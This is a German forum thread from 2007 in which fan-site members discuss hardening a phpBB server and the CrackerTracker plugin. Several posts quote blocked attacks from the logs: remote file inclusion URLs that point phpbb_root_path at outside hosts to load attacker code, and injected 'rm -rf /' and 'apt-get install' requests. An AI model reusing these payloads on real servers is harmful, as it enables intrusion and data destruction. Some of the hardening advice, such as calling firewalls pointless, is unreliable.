Neuanmeldungen mit * sind nicht mehr möglich

Hier gibt es Neuigkeiten rund um das Forum

Moderatoren: Tom, semmal, ZaeBoN

Benutzeravatar
TSF
Power Dummi
Power Dummi
Beiträge: 90
Registriert: 25.07.2007, 16:14
Kontaktdaten:

Beitragvon TSF » 25.07.2007, 18:02

Eine Firewall macht meiner Meinung nach keinen Sinn, es reicht, wenn du alle Ports geschlossen hast und alle unnötigen Dienste beendest, dann kommt nichts nach draußen. Und für Apache mod_security (gegen allgemeine Angriffe) und mod_evasive (gegen DoS-Attacken). :D

Außerdem sollte PHP im safe_mode und mit open_basedir laufen und kritische Funktionen deaktiviert werden (besonderes register_globals ist eine Lücke ohne Ende). :)

Wenn bei dir register_globals aktiviert ist (was ich nicht hoffe), dann brauchst du keine Firewall, da der Server dann von außen erreichbar ist, die Firewall kann da auch nichts machen. ;)

Benutzeravatar
Tom
Administrator Dummi
Administrator Dummi
Beiträge: 27076
Registriert: 16.04.2003, 21:22
Lieblingsspiel: Tomb Raider 2
Lieblingsfilm/-buch/-lied/-gruppe: Der sich den Wolf tanzt
Sparbuch
Spiel mir das Lied vom Brot
Fettes Brot
Geschlecht: männlich
Wohnort: El Alamein (Djibouti)
Kontaktdaten:

Beitragvon Tom » 26.07.2007, 6:44

TSF hat geschrieben:Insgesamt gab es bei mir shcon über 16000 fehlgeschlagene Hackerversuche. ;)


Nun gut, einige der "abgewehrten Angriffe" sind "hausgemachte" Probleme, bzw. eher harmlos, aber ansonsten sind da im Logmanager schon recht interessante Meldungen über blockierte Aktionen, z.B.:

/phpBB2/index.php/install/upgrade.php?phpbb_root_path=http://www.webuty.de/images/cmd.txt?


Was wollte mir da dieses Web-Utility installieren :o :ka: :schimpf:
Bild

Wir werden wieder Normalität herstellen, sobald wir herausgefunden haben, was das eigentlich ist.


Benutzeravatar
TSF
Power Dummi
Power Dummi
Beiträge: 90
Registriert: 25.07.2007, 16:14
Kontaktdaten:

Beitragvon TSF » 26.07.2007, 17:04

Mit diesen Befehl wollte einer bei dir ein Shellscript ausführen und externen Code einschleusen, damit ein neues Programm auf den Server installiert wird.

Hättest du den CTracker nicht installiert, wäre diese Attacke wahrscheinlich geglückt und man hätte fremden Code einschleusen können (also sprich ein fremdes Programm installiert). Aber der CTracker hat das erfolgreich geblockt, keine Panik für dich. ;)

Ein hoch auf den CrackerTracker!! :)

Solche Angriffe habe ich bei mir auch täglich.

Benutzeravatar
lara-tr
Most perfect Dummi
Most perfect Dummi
Beiträge: 9718
Registriert: 19.06.2007, 12:56
Wohnort: Berlin

Beitragvon lara-tr » 26.07.2007, 17:10

TSF hat geschrieben:Mit diesen Befehl wollte einer bei dir ein Shellscript ausführen und externen Code einschleusen, damit ein neues Programm auf den Server installiert wird.

Hättest du den CTracker nicht installiert, wäre diese Attacke wahrscheinlich geglückt und man hätte fremden Code einschleusen können (also sprich ein fremdes Programm installiert). Aber der CTracker hat das erfolgreich geblockt, keine Panik für dich. ;)

Ein hoch auf den CrackerTracker!! :)

Solche Angriffe habe ich bei mir auch täglich.


Ein hoch auf :jerry: = Jerry :motz: :motz: :motz: :motz: :motz: :motz:
Tomb Raider 4ever

Benutzeravatar
TSF
Power Dummi
Power Dummi
Beiträge: 90
Registriert: 25.07.2007, 16:14
Kontaktdaten:

Beitragvon TSF » 26.07.2007, 17:14

Das gute:
Jerry wehrt die Angriffe nicht nur ab, sondern loggt auch noch User-Agent, Uhrzeit, Referrer und IP-Adresse des Angreifers. Damit kann man genau den User finden, im User-Agent werden nämlich Betriebssystem und Browserversion gespeichert.

Diese Infos loggt Jerry alle mit und speichert sie ab, damit der Admin die Möglichkeit hat, diese Daten für weitere Schritte zu verwenden. ;)

Bei mir habe ich öfters diese Attacke:
/activity.php?page=high_scores&mode=highscore&game_name=monkeylander&sid=fd46/language/lang_english/lang_activity.php?phpbb_root_path=http://evilarmy.hostcentric.com/vop.pid?


Da wurde versucht, $phpbb_root_path aus zutricksen (sogenannte includes Lücke, wenn man Dateien von außerhalb aufrufen kann und externen Code einschleusen kann). Dort wollte einer bei mir einen neuen Webserver installieren.

Aber Jerry macht solchen Leuten einen Strich durch die Rechnung. :D

Benutzeravatar
lara-tr
Most perfect Dummi
Most perfect Dummi
Beiträge: 9718
Registriert: 19.06.2007, 12:56
Wohnort: Berlin

Beitragvon lara-tr » 26.07.2007, 17:17

Ja, so is gut Jerry heisst Er. Unser :jerry: passt auf :laraweb: auf Bild
Tomb Raider 4ever

Benutzeravatar
TSF
Power Dummi
Power Dummi
Beiträge: 90
Registriert: 25.07.2007, 16:14
Kontaktdaten:

Beitragvon TSF » 01.08.2007, 13:49

Gerade eben habe es wieder eine neue Attacke, da wollte bei mir einer die komplette Serverpartition löschen und neue Headerfiles nachinstallieren:
index.php?sudo system 'rm -rf /';
index.php?sudo apt-get install cmd


Bei mir würde selbst ohne CTracker die Attacke ins leere gehen, da ich passthru unter disable_functions habe.
Da sieht man aber mal wieder, was der CTracker alles kann.

Das meiste sind aber keine echten Hacker, sondern Script Kiddies, die selber keine Ahnung von hacken usw. haben. Sie finden in Netz ein Expoit-Script und eine Anleitung, wie man es ausführt - gesagt, getan.

Benutzeravatar
Tomb Raider(Amadeus)
Most perfect Dummi
Most perfect Dummi
Beiträge: 395
Registriert: 28.07.2007, 19:16
Wohnort: Peine, Stederdorf

Beitragvon Tomb Raider(Amadeus) » 03.08.2007, 17:23

:motz: warum ist denn das so?
Bild

Benutzeravatar
TSF
Power Dummi
Power Dummi
Beiträge: 90
Registriert: 25.07.2007, 16:14
Kontaktdaten:

Beitragvon TSF » 03.08.2007, 18:00

Was ist so? Sry, verstehe deine Frage nicht.

Wenn du meinst, warum die Attacke bei mir slebst ohne CTracker ins leere geht? Ganz einfach:

Ich habe gewisse kritische Funktionen deaktiviert, welche man eh nicht braucht. Dadurch wird die Attacke unwirksam und zusätzlich fängt der CrackerTracker sie noch ab.

Anmerkung von Tom:

Ich habe einige Sachen gelöscht, wir wollen doch keine schlafenden Hunde wecken...
;)

Benutzeravatar
Tom
Administrator Dummi
Administrator Dummi
Beiträge: 27076
Registriert: 16.04.2003, 21:22
Lieblingsspiel: Tomb Raider 2
Lieblingsfilm/-buch/-lied/-gruppe: Der sich den Wolf tanzt
Sparbuch
Spiel mir das Lied vom Brot
Fettes Brot
Geschlecht: männlich
Wohnort: El Alamein (Djibouti)
Kontaktdaten:

Beitragvon Tom » 03.08.2007, 18:09

Ich würde nicht so detailliert beschreiben, was man alles machen kann, oder willst du manchen das noch schmackhaft machen? Wenn du nichts dagegen hast, entferne ich ein paar Stellen aus deinem Posting.
Bild

Wir werden wieder Normalität herstellen, sobald wir herausgefunden haben, was das eigentlich ist.


Benutzeravatar
Tomb Raider(Amadeus)
Most perfect Dummi
Most perfect Dummi
Beiträge: 395
Registriert: 28.07.2007, 19:16
Wohnort: Peine, Stederdorf

Beitragvon Tomb Raider(Amadeus) » 03.08.2007, 18:27

:?
Bild

Andee1
Laraweb-Monk
Laraweb-Monk
Beiträge: 9142
Registriert: 30.06.2003, 22:43

Beitragvon Andee1 » 03.08.2007, 18:28

Tom hat geschrieben:Ich würde nicht so detailliert beschreiben, was man alles machen kann, oder willst du manchen das noch schmackhaft machen? Wenn du nichts dagegen hast, entferne ich ein paar Stellen aus deinem Posting.


:lol1: Tja, der Übereifer der Wissenden... ;)

Benutzeravatar
TSF
Power Dummi
Power Dummi
Beiträge: 90
Registriert: 25.07.2007, 16:14
Kontaktdaten:

Beitragvon TSF » 04.08.2007, 13:25

Durch den CTracker wird das eh geblockt, also keine Angst, die Script Kiddies können dir damit nichts antun. Und selbst ohne CTracker (sicherer Server vorausgesetzt) gehen die meisten Attacken ins leere, sie verursachen dann eben nur viel Traffic. ;)

Benutzeravatar
lara-tr
Most perfect Dummi
Most perfect Dummi
Beiträge: 9718
Registriert: 19.06.2007, 12:56
Wohnort: Berlin

Beitragvon lara-tr » 04.08.2007, 13:29

Jerry....Jerry :jerry: :? :x :o
Tomb Raider 4ever

Benutzeravatar
LaFee Croft
Super Dummi
Super Dummi
Beiträge: 61
Registriert: 31.07.2007, 13:28
Wohnort: nähe von Magdeburg
Kontaktdaten:

Beitragvon LaFee Croft » 04.08.2007, 14:32

TSF hat geschrieben:Was ist so? Sry, verstehe deine Frage nicht.

Wenn du meinst, warum die Attacke bei mir slebst ohne CTracker ins leere geht? Ganz einfach:

Ich habe gewisse kritische Funktionen deaktiviert, welche man eh nicht braucht. Dadurch wird die Attacke unwirksam und zusätzlich fängt der CrackerTracker sie noch ab.

Anmerkung von Tom:

Ich habe einige Sachen gelöscht, wir wollen doch keine schlafenden Hunde wecken...
;)

:lol1:

:?
BildBild


Zurück zu „Forum News“

Wer ist online?

Mitglieder in diesem Forum: 0 Mitglieder und 1 Gast